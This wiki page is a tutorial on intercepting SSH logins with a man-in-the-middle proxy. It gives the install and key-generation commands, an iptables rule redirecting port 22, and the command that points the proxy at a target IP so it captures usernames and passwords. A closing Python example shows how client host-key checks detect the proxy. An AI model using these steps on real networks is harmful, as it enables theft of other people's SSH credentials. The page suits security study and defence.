Difference between revisions of "MITM: mitm ssh"

From OnnoWiki

Revision as of 07:04, 7 April 2017

Source: http://www.atechnote.com/2016/10/intercept-username-and-password-using.html


Download

git clone https://github.com/mitmproxy/mitmproxy.git

(Note: mitmkeys and mitmproxy_ssh used below come from the saironiq fork that the Download section further down clones; the mitmproxy/mitmproxy repository is the HTTP(S) interception proxy and does not ship those SSH tools.)

Generate Keys

./mitmkeys

The generated keys are written to ~/.mitmkeys.

Install the proxy's public key on the server to be attacked

#Install SSH key
ssh-copy-id -i ~/.mitmkeys/id_rsa.pub user@victimserver

Run the proxy

Then run the proxy, pointing it at the victimserver.

./mitmproxy_ssh -H victimserver

This runs the proxy on localhost:2222

Now simply connect to the local proxy:

ssh localhost -p 2222

And ta-da! You should see the raw data sent between client and server in the window you ran mitmproxy_ssh.





Diagram

client --> mitmproxy --> ssh server

- target server ip: 192.168.202.124


Installation

$ sudo pip install twisted
$ sudo  apt-get install python-service-identity
$ pip install pycrypto


Download

$ git clone https://github.com/saironiq/mitmproxy.git

3- If mitmreplay_ssh does not run, the pycrypto version you installed may have a different module layout. Edit mitmproxy/mitmproxy/sshdebug.py:

 -- line 11: add the import

from Crypto.Util import number as cnumber

 -- line 655: call bytes_to_long through that module, so the line begins

mpints.append(cnumber.bytes_to_long(

(pycrypto itself is no longer maintained; PyCryptodome provides the same Crypto.Util.number.bytes_to_long under the same import path.)

4- generate the proxy's keys (the Generate Keys section above does this with ./mitmkeys; they go to ~/.mitmkeys)

$ cd mitmproxy
$ sudo ./mitmkeys

Update firewall

5- enable IP forwarding and add the NAT rule that sends port-22 traffic to the proxy's port 2222

$ sudo sysctl -w net.ipv4.ip_forward=1
$ sudo iptables -t nat -A PREROUTING -p tcp --dport 22 -j REDIRECT --to-ports 2222

The PREROUTING rule only rewrites packets that arrive on the proxy host from other machines (locally generated traffic goes through the nat OUTPUT chain, which is why the earlier section connects to localhost:2222 directly), so the client's traffic must already be routed through this host; how that is arranged is outside this page. Neither setting survives a reboot, and the rule stays in place until it is deleted with the same command using -D instead of -A.

6- run mitmproxy_ssh and point it at the target server 192.168.202.124

$ sudo ./mitmproxy_ssh -H 192.168.202.124 -s

7- When the client now logs in to the SSH server, the interception is transparent only if the client accepts the proxy's host key. The proxy presents its own key (generated by mitmkeys), not the server's: on a first connection the client just sees an unfamiliar fingerprint prompt, but if the server's key is already in known_hosts the client gets the "REMOTE HOST IDENTIFICATION HAS CHANGED" warning and, with OpenSSH's default StrictHostKeyChecking=ask, refuses the connection.

(Screenshot on the original page: the username and password captured on the mitmproxy PC when the client connects to 192.168.202.124.)
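The check in step 7 is the client's host-key verification, and it is the same check a client connecting to localhost:2222 in the first procedure above would make. The following Python is an added example, not code from the page or from the saironiq/mitmproxy project: it parses OpenSSH public-key lines and known_hosts entries (plain and hashed), computes the SHA256 fingerprint that ssh-keygen -lf prints, and classifies the key a server, or a proxy standing in for it, presents. The keys, hostnames and known_hosts content are constructed for the example; the key mitmkeys would generate is stood in for by assumed bytes.

```python
# Added example: the client-side host key check that step 7 relies on the
# victim skipping. It is not code from the page or from saironiq/mitmproxy.
# All keys and known_hosts lines below are constructed for the example.
import base64
import hashlib
import hmac
import struct


def ssh_string(data: bytes) -> bytes:
    """Encode bytes as an SSH wire-format string (uint32 length prefix)."""
    return struct.pack(">I", len(data)) + data


def make_ed25519_pubkey(raw32: bytes) -> str:
    """Build an OpenSSH 'ssh-ed25519 AAAA...' line from 32 raw key bytes.
    The blob OpenSSH base64-encodes is keytype || key, each as an SSH string.
    (Assumed key bytes; no real key pair is generated here.)"""
    blob = ssh_string(b"ssh-ed25519") + ssh_string(raw32)
    return "ssh-ed25519 " + base64.b64encode(blob).decode()


def fingerprint(pubkey_line: str) -> str:
    """SHA256 fingerprint as printed by `ssh-keygen -lf`: base64 of the
    SHA-256 of the decoded blob, '=' padding stripped."""
    blob = base64.b64decode(pubkey_line.split()[1])
    digest = hashlib.sha256(blob).digest()
    return "SHA256:" + base64.b64encode(digest).decode().rstrip("=")


def hash_hostname(hostname: str, salt: bytes) -> str:
    """Hashed known_hosts host field: |1|b64(salt)|b64(HMAC-SHA1(salt, host))."""
    mac = hmac.new(salt, hostname.encode(), hashlib.sha1).digest()
    return "|1|%s|%s" % (base64.b64encode(salt).decode(),
                         base64.b64encode(mac).decode())


def host_matches(field: str, hostname: str) -> bool:
    """Match a known_hosts host field, plain ('a,b') or hashed ('|1|...')."""
    if field.startswith("|1|"):
        _, _, salt_b64, _ = field.split("|", 3)
        expected = hash_hostname(hostname, base64.b64decode(salt_b64))
        return hmac.compare_digest(field, expected)
    return hostname in field.split(",")


def check_host_key(known_hosts: str, hostname: str, presented: str) -> str:
    """Classify the key a server (or a proxy in its place) presents.

    'match'   - same key type and key data already recorded for this host
    'changed' - a key of this type is recorded but differs: the
                'REMOTE HOST IDENTIFICATION HAS CHANGED' case, which OpenSSH
                refuses under the default StrictHostKeyChecking=ask
    'unknown' - no key of this type recorded: the first-connection prompt,
                where only the fingerprint the user reads protects them
    """
    keytype, keydata = presented.split()[:2]
    seen_same_type = False
    for line in known_hosts.splitlines():
        parts = line.strip().split()
        if len(parts) < 3 or parts[0].startswith("#"):
            continue
        if parts[0].startswith("@"):          # @cert-authority / @revoked
            parts = parts[1:]
        if len(parts) < 3 or not host_matches(parts[0], hostname):
            continue
        if parts[1] != keytype:
            continue
        seen_same_type = True
        if parts[2] == keydata:
            return "match"
    return "changed" if seen_same_type else "unknown"


# Constructed sample data: the real server's key, the key the proxy would
# generate with mitmkeys, and a known_hosts with the real key recorded for
# the target both as a plain and as a hashed entry.
SERVER_KEY = make_ed25519_pubkey(bytes(range(32)))
PROXY_KEY = make_ed25519_pubkey(bytes(range(32, 64)))
KNOWN_HOSTS = "\n".join([
    "# constructed for the example",
    "192.168.202.124 " + SERVER_KEY,
    hash_hostname("victimserver", b"\x11" * 20) + " " + SERVER_KEY,
])

if __name__ == "__main__":
    for host in ("192.168.202.124", "victimserver", "10.0.0.9"):
        print(host, fingerprint(PROXY_KEY),
              check_host_key(KNOWN_HOSTS, host, PROXY_KEY))
```

Run it and the proxy's key is reported as "changed" for both known_hosts forms and "unknown" for a host never seen before; the "unknown" case is the one that makes the interception transparent when the user accepts the prompt without comparing the fingerprint out of band.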

References